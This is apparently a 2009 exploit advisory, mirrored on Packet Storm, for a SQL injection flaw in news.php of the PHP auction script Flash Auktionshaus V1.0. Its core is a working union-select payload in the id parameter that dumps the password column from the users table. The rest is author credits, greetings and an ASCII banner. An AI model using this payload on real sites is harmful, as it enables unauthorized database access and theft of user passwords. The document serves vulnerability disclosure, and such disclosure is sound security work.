Flash Auktionshaus suffers from a remote SQL injection vulnerability in news.php.
6c809a1c8b13c7adeee47bd38da4f0e1b79604c3200635038a90f09a4c326b23# Exploit Title: Flash Auktionshaus SQL Injection news.php
# Date: found 22. Oktober 2009 um 01:28 details on my blog http://4004securityproject.wordpress.com/2009/10/22/flash-auktionshaus-sql-injection-news-php/
# Author: Easy Laster
# Software Link: http://xmedien.e-ee.de/auktionflash/
# Version: V.1.0
# Tested on: Windows
#more Web vulnerability on my blog http://4004securityproject.wordpress.com
########################################################################
##Flash Auktionshaus SQL Injection news.php ##
########################################################################
########################################################################
## _ _ _ _ ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ##
##| _| -_| .'| |___| | | _| -_| _| | -_| _| ##
##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
## ##
########################################################################
##########################################################################
#Script: Flash Auktionshaus news.php #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ buy this script ] #
#Founder: [ ea$y laster ] #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
#Price: [ Commercial License EUR 89.00 € #
#DEMO : http://xmedien.e-ee.de/auktionflash/ #
#############################################################################
#http://[demo].de/news.php?id=-1+union+select+1,2,password,4,5+from+users+--#
#############################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed